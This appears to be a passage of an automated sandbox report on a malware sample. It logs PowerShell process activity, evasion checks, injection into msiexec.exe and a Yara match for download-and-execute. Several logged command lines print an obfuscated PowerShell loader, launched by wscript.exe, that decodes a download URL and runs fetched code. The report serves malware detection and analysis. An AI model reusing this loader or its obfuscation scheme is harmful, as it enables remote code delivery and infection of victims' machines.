              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5736Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4140Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5667Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4167Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7940Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 7256Thread sleep count: 40 > 30Jump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: powershell.exe, 00000001.00000002.1887817834.000001F8B11D2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2294071887.0000000006651000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: msiexec.exe, 00000008.00000002.2294071887.00000000065EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWXWe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04F18870 LdrInitializeThunk,3_2_04F18870

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_7592.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7592, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7836, type: MEMORYSTR
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3860000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 1EFE44Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Panglossian Faktotumerne udfrelserne #>;$Espes='Nednormeringen83';<#Pirat Misjudgment Retroaktiv #>;$Buedes=$host.PrivateData;If ($Buedes) {$Burundieres++;}function Balladised($Alfedronnings47){$Udfrier=$Storcirklernes+$Alfedronnings47.Length-$Burundieres;for( $Haltered=5;$Haltered -lt $Udfrier;$Haltered+=6){$Sparebssernes+=$Alfedronnings47[$Haltered];}$Sparebssernes;}function Revanchistens($Nedlggende){ &($Rhabditis) ($Nedlggende);}$Eral219=Balladised 'StrstMDi sooUn erz SpliiDataololieflN.stlaTyp.s/Spast5Sved..Boeth0 akan pil( TiphW GastiAdvokn Dispd AmagoPurunwArch.s Eksp Bih NZygotTSeque soloe1 Chi.0Varef.Ragas0Cradl;Tienn MurinWBulleiCo.tenAnabo6at ri4Emoll;witch MortexPasti6Unsur4Sil o;Skole PolarrVanhevFrede:Sem c1Telep2Utill1 Upfl.stron0revel)Lauda MaillGBee aeBanklcScallk PaxioFarve/ Fois2Mul i0E end1Eryop0Misad0Intra1Jordb0f.ede1.rers IndheFsadleiG overS.arpetribuf .unjoDr ylxSolda/ Reo,1Ve ne2Subfe1Bact,.Resig0 Ret ';$Quagmirier=Balladised ' Vagau SmarsU dereLetlbrPrefi-harveAHelv GD optE.nindNA,rsdTMedal ';$Tillodont=Balladised 'U svehI.skat eeut .tjnpTndesspos t:Tsun,/Launc/OverfdForplrL rriiM,cigvAnisoeTabul.Waltog VrdioNonstoTrl ogreapolArchaeCinde.G,arycAfgr,o anim tave/Adjuru ViftcKoebu?Mod,aeUnderxBacktpGavekoTetrar ersotU,der=ArbejdNonproByde wG antn Fratl Pagio Pe pa ForpdAkkil&LytteiAvinddSka t=svire1Otocem refaVBeh nv ResesUnf.mI DiplVVanteWSnust7Udsig- S ovx Side9Ho orDDatabjJapanCAdonio Offe7OnicouDraabv F ge1 dioxZAprilODikkeoOdou Z MemptSrtjeTDamilNEpi azUngdoVStaliEFingeFPistoBPoppi5antem ';$Semimanagerial=Balladised 'Jal u>Skvat ';$Rhabditis=Balladised 'R,undiRes,aEUns axAmety ';$Scombroidea='Kohave';$Hypersensuously='\Margenindstilling.Sys';Revanchistens (Balladised 'Rockl$Blubbg HooclRe.isoSnitcbS rumaUnderlScrat:un exAtonesrSt rbv hum eDiskpmSlagfsHedess olsiPertigKursetutilg=Inter$ReannePer,sn ,evivAutor:Br.araMedmepSkibspOpf.ldTetr a OvultIdealaSlett+ nges$ ,ervHMinilyAiracpLeveaeKil erKbmanstid,eeShopfnPrav sTe rauUdv.koOp rauTewtasHom nlbundfy,absl ');Revanchistens (Balladised 'Lenna$Selvbgravetl PrepoSemidbFleksawarmhlElkos:Ov rcO LayevHy ereDriftrTo ollSett,sDemagsT kpleJord.t ealls .lfe=Buchs$ConosTRomanistvkolNickllFejl,omidsodKlyngo EngonSuba t lmu.TavlesFrie.psuperl TrafiComedtPenda( oris$ FlugS Je ne PhysmFis eiI,termBeci aSkrifn WorsaBlo.mgFornyeIntr.rIdrtsi Ma,ta Ansal svbc) Filn ');Revanchistens (Balladised 'Forgj[tandsNUnc ie sangt P am.JournSB rtkeScriprBagsivU.duciBrle.cBan eeSikrePCardooOv,rmi TilbnUdad tBarriMVaernaPsychn.eminaPrimpggenneeSkib,rLep o]Forre:Dever:DeodoS SemeeFlaggcorganuSmkfyr CuttiSevertAkvaryCruciPStandrMonk,oT utot .nfeoSofa,c Sammo Antil flir Gimme= Udva Mejed[ DomiN UdpleStudct Eph . PlanSQerumePilotcFordruSek.dr Thebi KnartIndusyExtraPGif wrDeadboDecomtErminovsentc FleroJakoblMoti,T Repoy cinepafslueUsort]Bever: Und :PseudTDragslLikrss.assa1Rigou2SuJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#panglossian faktotumerne udfrelserne #>;$espes='nednormeringen83';<#pirat misjudgment retroaktiv #>;$buedes=$host.privatedata;if ($buedes) {$burundieres++;}function balladised($alfedronnings47){$udfrier=$storcirklernes+$alfedronnings47.length-$burundieres;for( $haltered=5;$haltered -lt $udfrier;$haltered+=6){$sparebssernes+=$alfedronnings47[$haltered];}$sparebssernes;}function revanchistens($nedlggende){ &($rhabditis) ($nedlggende);}$eral219=balladised 'strstmdi sooun erz spliidataololiefln.stlatyp.s/spast5sved..boeth0 akan pil( tiphw gastiadvokn dispd amagopurunwarch.s eksp bih nzygottseque soloe1 chi.0varef.ragas0cradl;tienn murinwbulleico.tenanabo6at ri4emoll;witch mortexpasti6unsur4sil o;skole polarrvanhevfrede:sem c1telep2utill1 upfl.stron0revel)lauda maillgbee aebanklcscallk paxiofarve/ fois2mul i0e end1eryop0misad0intra1jordb0f.ede1.rers indhefsadleig overs.arpetribuf .unjodr ylxsolda/ reo,1ve ne2subfe1bact,.resig0 ret ';$quagmirier=balladised ' vagau smarsu dereletlbrprefi-harveahelv gd opte.nindna,rsdtmedal ';$tillodont=balladised 'u svehi.skat eeut .tjnptndesspos t:tsun,/launc/overfdforplrl rriim,cigvanisoetabul.waltog vrdiononstotrl ogreapolarchaecinde.g,arycafgr,o anim tave/adjuru viftckoebu?mod,aeunderxbacktpgavekotetrar ersotu,der=arbejdnonprobyde wg antn fratl pagio pe pa forpdakkil&lytteiavinddska t=svire1otocem refavbeh nv resesunf.mi diplvvantewsnust7udsig- s ovx side9ho orddatabjjapancadonio offe7onicoudraabv f ge1 dioxzaprilodikkeoodou z memptsrtjetdamilnepi azungdovstaliefingefpistobpoppi5antem ';$semimanagerial=balladised 'jal u>skvat ';$rhabditis=balladised 'r,undires,aeuns axamety ';$scombroidea='kohave';$hypersensuously='\margenindstilling.sys';revanchistens (balladised 'rockl$blubbg hooclre.isosnitcbs rumaunderlscrat:un exatonesrst rbv hum ediskpmslagfshedess olsipertigkursetutilg=inter$reanneper,sn ,evivautor:br.aramedmepskibspopf.ldtetr a ovultidealaslett+ nges$ ,ervhminilyairacpleveaekil erkbmanstid,eeshopfnprav ste rauudv.koop rautewtashom nlbundfy,absl ');revanchistens (balladised 'lenna$selvbgravetl preposemidbfleksawarmhlelkos:ov rco layevhy eredriftrto ollsett,sdemagst kplejord.t ealls .lfe=buchs$conostromanistvkolnickllfejl,omidsodklyngo engonsuba t lmu.tavlesfrie.psuperl traficomedtpenda( oris$ flugs je ne physmfis eii,termbeci askrifn worsablo.mgfornyeintr.ridrtsi ma,ta ansal svbc) filn ');revanchistens (balladised 'forgj[tandsnunc ie sangt p am.journsb rtkescriprbagsivu.ducibrle.cban eesikrepcardooov,rmi tilbnudad tbarrimvaernapsychn.eminaprimpggenneeskib,rlep o]forre:dever:deodos semeeflaggcorganusmkfyr cuttisevertakvarycrucipstandrmonk,ot utot .nfeosofa,c sammo antil flir gimme= udva mejed[ domin udplestudct eph . plansqerumepilotcfordrusek.dr thebi knartindusyextrapgif wrdeadbodecomterminovsentc flerojakoblmoti,t repoy cinepafslueusort]bever: und :pseudtdragsllikrss.assa1rigou2su
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#panglossian faktotumerne udfrelserne #>;$espes='nednormeringen83';<#pirat misjudgment retroaktiv #>;$buedes=$host.privatedata;if ($buedes) {$burundieres++;}function balladised($alfedronnings47){$udfrier=$storcirklernes+$alfedronnings47.length-$burundieres;for( $haltered=5;$haltered -lt $udfrier;$haltered+=6){$sparebssernes+=$alfedronnings47[$haltered];}$sparebssernes;}function revanchistens($nedlggende){ &($rhabditis) ($nedlggende);}$eral219=balladised 'strstmdi sooun erz spliidataololiefln.stlatyp.s/spast5sved..boeth0 akan pil( tiphw gastiadvokn dispd amagopurunwarch.s eksp bih nzygottseque soloe1 chi.0varef.ragas0cradl;tienn murinwbulleico.tenanabo6at ri4emoll;witch mortexpasti6unsur4sil o;skole polarrvanhevfrede:sem c1telep2utill1 upfl.stron0revel)lauda maillgbee aebanklcscallk paxiofarve/ fois2mul i0e end1eryop0misad0intra1jordb0f.ede1.rers indhefsadleig overs.arpetribuf .unjodr ylxsolda/ reo,1ve ne2subfe1bact,.resig0 ret ';$quagmirier=balladised ' vagau smarsu dereletlbrprefi-harveahelv gd opte.nindna,rsdtmedal ';$tillodont=balladised 'u svehi.skat eeut .tjnptndesspos t:tsun,/launc/overfdforplrl rriim,cigvanisoetabul.waltog vrdiononstotrl ogreapolarchaecinde.g,arycafgr,o anim tave/adjuru viftckoebu?mod,aeunderxbacktpgavekotetrar ersotu,der=arbejdnonprobyde wg antn fratl pagio pe pa forpdakkil&lytteiavinddska t=svire1otocem refavbeh nv resesunf.mi diplvvantewsnust7udsig- s ovx side9ho orddatabjjapancadonio offe7onicoudraabv f ge1 dioxzaprilodikkeoodou z memptsrtjetdamilnepi azungdovstaliefingefpistobpoppi5antem ';$semimanagerial=balladised 'jal u>skvat ';$rhabditis=balladised 'r,undires,aeuns axamety ';$scombroidea='kohave';$hypersensuously='\margenindstilling.sys';revanchistens (balladised 'rockl$blubbg hooclre.isosnitcbs rumaunderlscrat:un exatonesrst rbv hum ediskpmslagfshedess olsipertigkursetutilg=inter$reanneper,sn ,evivautor:br.aramedmepskibspopf.ldtetr a ovultidealaslett+ nges$ ,ervhminilyairacpleveaekil erkbmanstid,eeshopfnprav ste rauudv.koop rautewtashom nlbundfy,absl ');revanchistens (balladised 'lenna$selvbgravetl preposemidbfleksawarmhlelkos:ov rco layevhy eredriftrto ollsett,sdemagst kplejord.t ealls .lfe=buchs$conostromanistvkolnickllfejl,omidsodklyngo engonsuba t lmu.tavlesfrie.psuperl traficomedtpenda( oris$ flugs je ne physmfis eii,termbeci askrifn worsablo.mgfornyeintr.ridrtsi ma,ta ansal svbc) filn ');revanchistens (balladised 'forgj[tandsnunc ie sangt p am.journsb rtkescriprbagsivu.ducibrle.cban eesikrepcardooov,rmi tilbnudad tbarrimvaernapsychn.eminaprimpggenneeskib,rlep o]forre:dever:deodos semeeflaggcorganusmkfyr cuttisevertakvarycrucipstandrmonk,ot utot .nfeosofa,c sammo antil flir gimme= udva mejed[ domin udplestudct eph . plansqerumepilotcfordrusek.dr thebi knartindusyextrapgif wrdeadbodecomterminovsentc flerojakoblmoti,t repoy cinepafslueusort]bever: und :pseudtdragsllikrss.assa1rigou2su
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#panglossian faktotumerne udfrelserne #>;$espes='nednormeringen83';<#pirat misjudgment retroaktiv #>;$buedes=$host.privatedata;if ($buedes) {$burundieres++;}function balladised($alfedronnings47){$udfrier=$storcirklernes+$alfedronnings47.length-$burundieres;for( $haltered=5;$haltered -lt $udfrier;$haltered+=6){$sparebssernes+=$alfedronnings47[$haltered];}$sparebssernes;}function revanchistens($nedlggende){ &($rhabditis) ($nedlggende);}$eral219=balladised 'strstmdi sooun erz spliidataololiefln.stlatyp.s/spast5sved..boeth0 akan pil( tiphw gastiadvokn dispd amagopurunwarch.s eksp bih nzygottseque soloe1 chi.0varef.ragas0cradl;tienn murinwbulleico.tenanabo6at ri4emoll;witch mortexpasti6unsur4sil o;skole polarrvanhevfrede:sem c1telep2utill1 upfl.stron0revel)lauda maillgbee aebanklcscallk paxiofarve/ fois2mul i0e end1eryop0misad0intra1jordb0f.ede1.rers indhefsadleig overs.arpetribuf .unjodr ylxsolda/ reo,1ve ne2subfe1bact,.resig0 ret ';$quagmirier=balladised ' vagau smarsu dereletlbrprefi-harveahelv gd opte.nindna,rsdtmedal ';$tillodont=balladised 'u svehi.skat eeut .tjnptndesspos t:tsun,/launc/overfdforplrl rriim,cigvanisoetabul.waltog vrdiononstotrl ogreapolarchaecinde.g,arycafgr,o anim tave/adjuru viftckoebu?mod,aeunderxbacktpgavekotetrar ersotu,der=arbejdnonprobyde wg antn fratl pagio pe pa forpdakkil&lytteiavinddska t=svire1otocem refavbeh nv resesunf.mi diplvvantewsnust7udsig- s ovx side9ho orddatabjjapancadonio offe7onicoudraabv f ge1 dioxzaprilodikkeoodou z memptsrtjetdamilnepi azungdovstaliefingefpistobpoppi5antem ';$semimanagerial=balladised 'jal u>skvat ';$rhabditis=balladised 'r,undires,aeuns axamety ';$scombroidea='kohave';$hypersensuously='\margenindstilling.sys';revanchistens (balladised 'rockl$blubbg hooclre.isosnitcbs rumaunderlscrat:un exatonesrst rbv hum ediskpmslagfshedess olsipertigkursetutilg=inter$reanneper,sn ,evivautor:br.aramedmepskibspopf.ldtetr a ovultidealaslett+ nges$ ,ervhminilyairacpleveaekil erkbmanstid,eeshopfnprav ste rauudv.koop rautewtashom nlbundfy,absl ');revanchistens (balladised 'lenna$selvbgravetl preposemidbfleksawarmhlelkos:ov rco layevhy eredriftrto ollsett,sdemagst kplejord.t ealls .lfe=buchs$conostromanistvkolnickllfejl,omidsodklyngo engonsuba t 